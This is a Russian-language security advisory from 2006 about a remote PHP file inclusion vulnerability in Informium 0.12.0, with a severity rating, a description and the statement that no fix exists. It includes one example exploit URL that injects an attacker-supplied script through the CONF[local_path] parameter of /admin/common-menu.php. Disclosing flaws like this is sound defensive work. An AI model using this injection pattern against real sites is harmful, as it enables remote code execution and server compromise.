PHP-инклюдинг в Informium

Дата публикации:
14.06.2006
Всего просмотров:
997
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Informium 0.x
Уязвимые версии: Informium 0.12.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CONF[local_path]" в сценарии /admin/common-menu.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://www.site.com/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]

URL производителя: sourceforge.net/project/showfiles.php?...release_id=100921

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA